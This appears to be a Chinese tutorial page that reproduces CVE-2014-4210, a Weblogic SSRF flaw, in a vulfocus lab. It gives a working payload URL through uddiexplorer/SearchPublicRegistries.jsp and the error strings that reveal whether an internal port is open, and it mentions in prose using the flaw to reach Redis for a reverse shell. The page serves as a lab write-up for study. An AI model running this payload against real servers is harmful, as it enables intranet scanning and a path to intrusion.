zl程序教程

您现在的位置是:首页 >  Java

当前栏目

CVE-2014-4210 Weblogic SSRF漏洞

2023-02-18 16:48:05 时间

漏洞简介

事项

描述

漏洞概述

探测内网存活的ip和端口,探测内网系统中存在的文件,如果内网有IP开启redis服务,我们就可以用存在ssrf的服务器给含有redis服务的服务器发送命令,然后反弹shell,有些ssrf还可以利用file协议对目标机本地的文件进行读取。路径是uddiexplorer/SearchPublicRegistries.jsp

影响范围

10.0.2 – 10.3.6

漏洞编号

CVE-2014-4210

漏洞搭建

这里使用vulfocus进行复现。

漏洞复现

访问http://192.168.146.167:29194/uddiexplorer/SearchPublicRegistries.jsp,发现需要登录,作罢。

构造恶意payload,查看7001端口是否开放(默认的weblogic端口)

 http://192.168.146.167:29194/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

发现当内网存在该资源的时候,其特征是

 weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://127.0.0.1:7001 returned a 404 error code (Not Found).  Please ensure that your URL is correct, and the web service has deployed without error.

而不存在该资源的时候,其特征是

 weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '6379'